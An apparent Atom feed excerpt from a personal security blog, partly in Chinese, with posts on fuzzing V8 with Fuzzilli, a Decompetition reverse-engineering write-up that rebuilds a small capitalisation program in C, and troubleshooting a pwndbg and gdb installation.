reinstalled Swift as well.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/v8$ git checkout origin</span><br><span class="line">fr3y@ubuntu:~/v8$ gclient sync -D</span><br><span class="line">fr3y@ubuntu:~/v8$ ./fuzzbuild.sh</span><br><span class="line">fr3y@ubuntu:~/fuzzilli$ sudo sysctl -w <span class="string">'kernel.core_pattern=|/bin/false'</span></span><br><span class="line">fr3y@ubuntu:~/fuzzilli$ swift run FuzzilliCli --profile=v8 --storagePath=/home/fr3y/Desktop/crashes /home/fr3y/v8/out/fuzzbuild/d8</span><br></pre></td></tr></table></figure><p><strong>[Fuzzer] Let’s go!</strong></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">Fuzzer state: Fuzzing (with MutationEngine)</span><br><span class="line">Uptime: 0d 0h 30m 0s</span><br><span class="line">Total Samples: 12666</span><br><span class="line">Interesting Samples Found: 1437</span><br><span class="line">Last Interesting Sample: 0d 0h 0m 4s</span><br><span class="line">Valid Samples Found: 8959</span><br><span class="line">Corpus Size: 1435</span><br><span class="line">Correctness Rate: 71.00% (overall: 70.73%)</span><br><span class="line">Timeout Rate: 1.90% (overall: 1.53%)</span><br><span class="line">Crashes Found: 0</span><br><span class="line">Timeouts Hit: 194</span><br><span class="line">Coverage: 7.88%</span><br><span class="line">Avg. program size: 48.27</span><br><span class="line">Avg. corpus program size: 11.28</span><br><span class="line">Avg. program execution time: 20ms</span><br><span class="line">Connected nodes: 0</span><br><span class="line">Execs / Second: 36.91</span><br><span class="line">Fuzzer Overhead: 18.61%</span><br><span class="line">Total Execs: 93155</span><br></pre></td></tr></table></figure><p>It is now difficult to discover new vulnerabilities using the default fuzzing approach. Going forward, it will be necessary to adjust the fuzzing strategy, input corpus, mutation rate, code coverage and other factors. </p>]]></content>
<summary type="html"><p><a href="https://github.com/antonio-morales/Fuzzing101/tree/main/Exercise%2010">https://github.com/antonio-morales/Fuzzing101/tree/main/Exercise%2010</a></p>
<p><strong>Note!!!</strong> Fuzzilli-0.9 is an unsuccessful attempt. It is recommended to start directly with the latest version of Fuzzilli (starting from the “Let’s Fuzz!” section).</p>
<p>System: Ubuntu 20.04 LTS</p></summary>
<category term="Security" scheme="https://f23y.github.io/categories/Security/"/>
<category term="fuzz" scheme="https://f23y.github.io/tags/fuzz/"/>
</entry>
<entry>
<title>Decompetition v2.0 baby-c writeup</title>
<link href="https://f23y.github.io/2022/02/17/Decompetition%20v2.0%20baby-c%20writeup/"/>
<id>https://f23y.github.io/2022/02/17/Decompetition%20v2.0%20baby-c%20writeup/</id>
<published>2022-02-17T02:26:55.000Z</published>
<updated>2025-09-27T10:58:47.823Z</updated>
<content type="html"><![CDATA[<p>2022逆向挑战赛中一道简单的C逆向,由于作者能力有限先写了这一篇writeup,其他的还在弄懂中。。</p><p>比赛官网:<a href="https://decompetition.io/">https://decompetition.io/</a></p><p>github:<a href="https://github.com/decompetition/challenges-2021">https://github.com/decompetition/challenges-2021</a></p><span id="more"></span><h3 id="baby-c"><a href="#baby-c" class="headerlink" title="baby-c"></a>baby-c</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line">; This is the disassembly you're trying to reproduce.</span><br><span class="line">; It uses Intel syntax (mov dst, src).</span><br><span class="line"></span><br><span class="line">; 一些初始化操作,把某个变量的值赋为1。</span><br><span class="line">main:</span><br><span class="line"> endbr64</span><br><span class="line"> push rbp</span><br><span class="line"> mov rbp, rsp</span><br><span class="line"> push rbx</span><br><span class="line"> sub rsp, 0x18</span><br><span class="line"> mov [rbp-0x15], 1</span><br><span class="line">; 调用getc函数,将获取到的输入与-1比较,若相等则跳转到block7。</span><br><span class="line">block1:</span><br><span class="line"> mov rax, [stdin]</span><br><span class="line"> mov rdi, rax</span><br><span class="line"> call getc@plt.sec</span><br><span class="line"> mov [rbp-0x14], eax</span><br><span class="line"> cmp [rbp-0x14], -1</span><br><span class="line"> je block7</span><br><span class="line">; 调用__ctype_b_loc函数,把结果放在rax中,将获取到的输入进行一系列赋值运算。</span><br><span class="line">; 然后eax与0x2000做与运算,测试eax,若相等则跳转到block4。</span><br><span class="line">block2:</span><br><span class="line"> call __ctype_b_loc@plt.sec</span><br><span class="line"> mov rax, [rax]</span><br><span class="line"> mov edx, [rbp-0x14]</span><br><span class="line"> movsxd rdx, edx</span><br><span class="line"> add rdx, rdx</span><br><span class="line"> add rax, rdx</span><br><span class="line"> movzx eax, [rax]</span><br><span class="line"> movzx eax, ax</span><br><span class="line"> and eax, 0x2000</span><br><span class="line"> test eax, eax </span><br><span class="line"> je block4</span><br><span class="line">; 这里可以看到stdout和我们之前的输入,调用putc,将某个变量赋值为1,跳转到block1。</span><br><span class="line">block3:</span><br><span class="line"> mov rdx, [stdout]</span><br><span class="line"> mov eax, [rbp-0x14]</span><br><span class="line"> mov rsi, rdx</span><br><span class="line"> mov edi, eax</span><br><span class="line"> call putc@plt.sec</span><br><span class="line"> mov [rbp-0x15], 1</span><br><span class="line"> jmp block1</span><br><span class="line">; 比较某个变量与0,若相等跳转到block6。</span><br><span class="line">block4:</span><br><span class="line"> cmp [rbp-0x15], 0</span><br><span class="line"> je block6</span><br><span class="line">; 调用了toupper函数,将某个变量赋值为0,跳转到block1。</span><br><span class="line">block5:</span><br><span class="line"> mov rbx, [stdout]</span><br><span class="line"> mov eax, [rbp-0x14]</span><br><span class="line"> mov edi, eax</span><br><span class="line"> call toupper@plt.sec</span><br><span class="line"> mov rsi, rbx</span><br><span class="line"> mov edi, eax</span><br><span class="line"> call putc@plt.sec</span><br><span class="line"> mov [rbp-0x15], 0</span><br><span class="line"> jmp block1</span><br><span class="line">; 调用了tolower函数,调用了putc,跳转到block1。</span><br><span class="line">block6:</span><br><span class="line"> mov rbx, [stdout]</span><br><span class="line"> mov eax, [rbp-0x14]</span><br><span class="line"> mov edi, eax</span><br><span class="line"> call tolower@plt.sec</span><br><span class="line"> mov rsi, rbx</span><br><span class="line"> mov edi, eax</span><br><span class="line"> call putc@plt.sec</span><br><span class="line"> jmp block1</span><br><span class="line">; return 0</span><br><span class="line">block7:</span><br><span class="line"> mov eax, 0</span><br><span class="line"> add rsp, 0x18</span><br><span class="line"> pop rbx</span><br><span class="line"> pop rbp</span><br><span class="line"> ret</span><br></pre></td></tr></table></figure><p>写完注释感觉好一些了,对自己的逆向燃起了一丢丢希望。</p><p>一共用到了<strong>两个变量</strong>:<code>[rbp-0x15] </code>和 <code>[rbp-0x14]</code></p><p><strong>补充知识</strong>:<code>__ctype_b_loc</code> 函数</p><p>这个函数定义在 <a href="https://www.cnblogs.com/haomiao/p/6128459.html">ctype.h标准库</a> ,参考<a href="https://xuanxuanblingbling.github.io/ctf/pwn/2020/05/19/calc/">这篇文章</a>。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">v3 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isalnum %d\n"</span>, (*v3)[s] & <span class="number">8</span>);</span><br><span class="line"> v4 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isalpha %d\n"</span>, (*v4)[s] & <span class="number">0x400</span>);</span><br><span class="line"> v5 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"iscntrl %d\n"</span>, (*v5)[s] & <span class="number">2</span>);</span><br><span class="line"> v6 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isdigit %d\n"</span>, (*v6)[s] & <span class="number">0x800</span>);</span><br><span class="line"> v7 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isgraph %d\n"</span>, (*v7)[s] & <span class="number">0x8000</span>);</span><br><span class="line"> v8 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"islower %d\n"</span>, (*v8)[s] & <span class="number">0x200</span>);</span><br><span class="line"> v9 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isprint %d\n"</span>, (*v9)[s] & <span class="number">0x4000</span>);</span><br><span class="line"> v10 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"ispunct %d\n"</span>, (*v10)[s] & <span class="number">4</span>);</span><br><span class="line"> v11 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isspace %d\n"</span>, (*v11)[s] & <span class="number">0x2000</span>);</span><br><span class="line"> v12 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isupper %d\n"</span>, (*v12)[s] & <span class="number">0x100</span>);</span><br><span class="line"> v13 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isxdigit %d\n"</span>, (*v13)[s] & <span class="number">0x1000</span>);</span><br><span class="line"> v14 = __ctype_b_loc();</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"isblank %d\n"</span>, (*v14)[s] & <span class="number">1</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br></pre></td></tr></table></figure><p>我们可以看到0x2000是isspace,可以使用它来实现。</p><p>运行一下:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~$ ./baby-c</span><br><span class="line">abcd789uiuiuiu</span><br><span class="line">Abcd789uiuiuiu</span><br><span class="line">DE890absdUUUUU</span><br><span class="line">De890absduuuuu</span><br></pre></td></tr></table></figure><p>功能就是把首字母大写,其余小写。</p><p>不过刚刚作为一个废物发现自己并不能直接对着汇编写源码,所以用IDA反汇编了给出的可执行文件,稍微修改了一下。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><ctype.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">char</span> v7; </span><br><span class="line"> <span class="keyword">int</span> input; </span><br><span class="line"></span><br><span class="line"> v7 = <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line"> {</span><br><span class="line"> input = getc(<span class="built_in">stdin</span>);</span><br><span class="line"> <span class="keyword">if</span> ( input == <span class="number">-1</span> )</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">if</span> ( ((*__ctype_b_loc())[input] & <span class="number">0x2000</span>) != <span class="number">0</span> )</span><br><span class="line"> {</span><br><span class="line"> putc(input, <span class="built_in">stdout</span>);</span><br><span class="line"> v7 = <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( v7 )</span><br><span class="line"> {</span><br><span class="line"> putc(<span class="built_in">toupper</span>(input), <span class="built_in">stdout</span>);</span><br><span class="line"> v7 = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> putc(<span class="built_in">tolower</span>(input), <span class="built_in">stdout</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>运行结果:</p><table><thead><tr><th>Source</th><th>Score</th><th>Weight</th><th>Total</th></tr></thead><tbody><tr><td>Test Cases</td><td>100%</td><td>20%</td><td>20%</td></tr><tr><td>ASM Diff</td><td>100%</td><td>60%</td><td>60%</td></tr><tr><td>Perfect Match Bonus</td><td>100%</td><td>20%</td><td>20%</td></tr><tr><td>Latest Submission</td><td></td><td></td><td>100%</td></tr></tbody></table><p>IDA真的牛,我不如IDA…T_T</p><p>对于这道题我同样试了下ghidra,发现结果不如IDA清楚。。(</p><p>贴下这道题的源码:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><ctype.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">char</span> cap = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span>(<span class="number">1</span>) {</span><br><span class="line"> <span class="keyword">int</span> c = getc(<span class="built_in">stdin</span>);</span><br><span class="line"> <span class="keyword">if</span>(c == EOF) <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="built_in">isspace</span>(c)) {</span><br><span class="line"> putc(c, <span class="built_in">stdout</span>);</span><br><span class="line"> cap = <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span>(cap) {</span><br><span class="line"> putc(<span class="built_in">toupper</span>(c), <span class="built_in">stdout</span>);</span><br><span class="line"> cap = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> putc(<span class="built_in">tolower</span>(c), <span class="built_in">stdout</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>确实用了isspace…</p><p>我确实是一个逆向小菜鸡。。。</p>]]></content>
<summary type="html"><p>2022逆向挑战赛中一道简单的C逆向,由于作者能力有限先写了这一篇writeup,其他的还在弄懂中。。</p>
<p>比赛官网:<a href="https://decompetition.io/">https://decompetition.io/</a></p>
<p>github:<a href="https://github.com/decompetition/challenges-2021">https://github.com/decompetition/challenges-2021</a></p></summary>
<category term="Security" scheme="https://f23y.github.io/categories/Security/"/>
<category term="reverse" scheme="https://f23y.github.io/tags/reverse/"/>
</entry>
<entry>
<title>修pwndbg血泪史</title>
<link href="https://f23y.github.io/2022/02/08/%E4%BF%AEpwndbg%E8%A1%80%E6%B3%AA%E5%8F%B2/"/>
<id>https://f23y.github.io/2022/02/08/%E4%BF%AEpwndbg%E8%A1%80%E6%B3%AA%E5%8F%B2/</id>
<published>2022-02-07T15:30:00.000Z</published>
<updated>2025-09-27T11:01:55.598Z</updated>
<content type="html"><![CDATA[<h2 id="前情提要"><a href="#前情提要" class="headerlink" title="前情提要"></a>前情提要</h2><p>起gdb的时候发现自己pwndbg起不来。。。</p><span id="more"></span><h3 id="import问题"><a href="#import问题" class="headerlink" title="import问题"></a>import问题</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/root/.gdbinit:1: Error in sourced command file: Undefind command “import“.</span><br></pre></td></tr></table></figure><p>配置了一下source但是没有用,查了一下,可能是因为同时安装了两个gdb(源码make一个,apt装一个)导致gdbinit定位错误。于是把gdb全卸了连带pwndbg重新装了一遍,依然没有用。</p><p>不过安装pwndbg的时候发现python scripting is not supported in the copy of gdb.</p><p>于是尝试编译gdb的时候 ./configure –with-python 然后make。这个方法有用。</p><h3 id="pip问题"><a href="#pip问题" class="headerlink" title="pip问题"></a>pip问题</h3><p>重新安装pwndbg。发现</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">ensurepip is disabled in Debian/Ubuntu for the system python.</span><br><span class="line">Python modules For the system python are usually handled by dpkg and apt-get.</span><br><span class="line"></span><br><span class="line"> apt-get install python-<module name></span><br><span class="line"></span><br><span class="line">Install the python-pip package to use pip itself. Using pip together</span><br><span class="line">with the system python might have unexpected results for any system installed</span><br><span class="line">module, so use it on your own risk, or make sure to only use it in virtual</span><br><span class="line">environments.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这个pwndbg用的是python2.7。</p><p>那么问题来了,新版本的apt不再支持pip2的安装。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/pwndbg$ sudo apt install python-pip</span><br><span class="line">Reading package lists... Done</span><br><span class="line">Building dependency tree </span><br><span class="line">Reading state information... Done</span><br><span class="line">Package python-pip is not available, but is referred to by another package.</span><br><span class="line">This may mean that the package is missing, has been obsoleted, or</span><br><span class="line">is only available from another source</span><br><span class="line">However the following packages replace it:</span><br><span class="line"> python3-pip</span><br><span class="line"></span><br><span class="line">E: Package 'python-pip' has no installation candidate</span><br></pre></td></tr></table></figure><p>我们试试看手动安装。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wget https://bootstrap.pypa.io/pip/2.7/get-pip.py</span><br><span class="line">sudo python2 get-pip.py</span><br></pre></td></tr></table></figure><p>使用python2安装pwntools。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo python2 -m pip install --upgrade pwntools</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/pwndbg$ python2 </span><br><span class="line">Python 2.7.18 (default, Mar 8 2021, 13:02:45) </span><br><span class="line">[GCC 9.3.0] on linux2</span><br><span class="line">Type "help", "copyright", "credits" or "license" for more information.</span><br><span class="line">>>> import pwn</span><br><span class="line">>>> pwn.asm('xor eax,eax')</span><br><span class="line">'1\xc0'</span><br><span class="line">>>> </span><br></pre></td></tr></table></figure><p>重新安装pwndbg。sudo ./setup.sh</p><p>出现 + grep pwndbg /root/.gdbinit </p><p>好像安装成功了。。</p><p>然而。。。还是不行</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/pwndbg$ gdb -q</span><br><span class="line">Traceback (most recent call last):</span><br><span class="line"> File "/home/fr3y/pwndbg/gdbinit.py", line 24, in <module></span><br><span class="line"> import pwndbg # isort:skip</span><br><span class="line"> File "/home/fr3y/pwndbg/pwndbg/__init__.py", line 7, in <module></span><br><span class="line"> import pwndbg.android</span><br><span class="line"> File "/home/fr3y/pwndbg/pwndbg/android.py", line 5, in <module></span><br><span class="line"> import pwndbg.color.message as message</span><br><span class="line"> File "/home/fr3y/pwndbg/pwndbg/color/__init__.py", line 4, in <module></span><br><span class="line"> import pwndbg.memoize</span><br><span class="line"> File "/home/fr3y/pwndbg/pwndbg/memoize.py", line 42</span><br><span class="line"> print("Cannot memoize %r!", file=sys.stderr)</span><br><span class="line"> ^</span><br><span class="line">SyntaxError: invalid syntax</span><br><span class="line">(gdb) q</span><br></pre></td></tr></table></figure><p>这是python3的语法。。。</p><p>我先去编译一个python3的gdb。</p><h3 id="python3之路"><a href="#python3之路" class="headerlink" title="python3之路"></a>python3之路</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./configure --with-python=/usr/bin/python3</span><br></pre></td></tr></table></figure><p>然后make,让我们检查一下python版本。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/gdb-11.2$ readelf -d $(which gdb) | grep python</span><br><span class="line"> 0x0000000000000001 (NEEDED) Shared library: [libpython3.8.so.1.0]</span><br></pre></td></tr></table></figure><p>重新安装pwndbg,试试运行一下。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/pwndbg$ gdb -q</span><br><span class="line">pwndbg: loaded 198 commands. Type pwndbg [filter] for a list.</span><br><span class="line">pwndbg: created $rebase, $ida gdb functions (can be used with print/break)</span><br><span class="line">pwndbg> q</span><br></pre></td></tr></table></figure><p>成功(流泪)</p><p>以下为rwctf2022 hso-groupie那道题的调试界面(终于可以调了):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">► 0x555555675150 mov rax, qword ptr [rdi + 0x48]</span><br><span class="line"> 0x555555675154 mov edx, dword ptr [rax + 0xc]</span><br><span class="line"> 0x555555675157 test edx, edx</span><br><span class="line"> 0x555555675159 jle 0x555555675190 <0x555555675190></span><br><span class="line"> </span><br><span class="line"> 0x55555567515b mov rax, qword ptr [rax]</span><br><span class="line"> 0x55555567515e sub edx, 1</span><br><span class="line"> 0x555555675161 lea rdx, [rax + rdx*8 + 8]</span><br><span class="line"> 0x555555675166 jmp 0x555555675179 <0x555555675179></span><br><span class="line"> ↓</span><br><span class="line"> 0x555555675179 mov r8, qword ptr [rax]</span><br><span class="line"> 0x55555567517c cmp dword ptr [r8 + 8], esi</span><br><span class="line"> 0x555555675180 jne 0x555555675170 <0x555555675170></span><br><span class="line">───────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────</span><br><span class="line">In file: /home/fr3y/hso-groupie/chall/xpdf-4.03/xpdf/JBIG2Stream.cc</span><br><span class="line"> 4035 </span><br><span class="line"> 4036 JBIG2Segment *JBIG2Stream::findSegment(Guint segNum) {</span><br><span class="line"> 4037 JBIG2Segment *seg;</span><br><span class="line"> 4038 int i;</span><br><span class="line"> 4039 </span><br><span class="line"> ► 4040 for (i = 0; i < globalSegments->getLength(); ++i) {</span><br><span class="line"> 4041 seg = (JBIG2Segment *)globalSegments->get(i);</span><br><span class="line"> 4042 if (seg->getSegNum() == segNum) {</span><br><span class="line"> 4043 return seg;</span><br><span class="line"> 4044 }</span><br><span class="line"> 4045 }</span><br><span class="line">───────────────────────────────────────────[ STACK ]────────────────────────────────────────────</span><br><span class="line">00:0000│ rsp 0x7fffffffdd08 —▸ 0x555555676c72 ◂— mov r12, rax</span><br><span class="line">01:0008│ 0x7fffffffdd10 ◂— 0x0</span><br><span class="line">02:0010│ 0x7fffffffdd18 ◂— 0x0</span><br><span class="line">03:0018│ 0x7fffffffdd20 —▸ 0x555561ec0ac0 ◂— 0x200000001</span><br><span class="line">04:0020│ 0x7fffffffdd28 —▸ 0x555561f40824 ◂— 0x207e100000000</span><br><span class="line">05:0028│ 0x7fffffffdd30 ◂— 0x0</span><br><span class="line">... ↓ 2 skipped</span><br><span class="line">─────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────</span><br><span class="line"> ► f 0 0x555555675150</span><br><span class="line"> f 1 0x555555676c72</span><br><span class="line"> f 2 0x555555679198 JBIG2Stream::readSegments()+1032</span><br><span class="line"> f 3 0x555555679473 JBIG2Stream::reset()+211</span><br><span class="line"> f 4 0x55555560139a</span><br><span class="line"> f 5 0x5555556494a9</span><br><span class="line"> f 6 0x55555564aba0</span><br><span class="line"> f 7 0x55555563c9e5</span><br><span class="line">────────────────────────────────────────────────────────────────────────────────────────────────</span><br><span class="line">pwndbg> </span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="反思"><a href="#反思" class="headerlink" title="反思"></a>反思</h3><p>早点查看官方文档,搞清楚版本,不要盲目debug。。</p>]]></content>
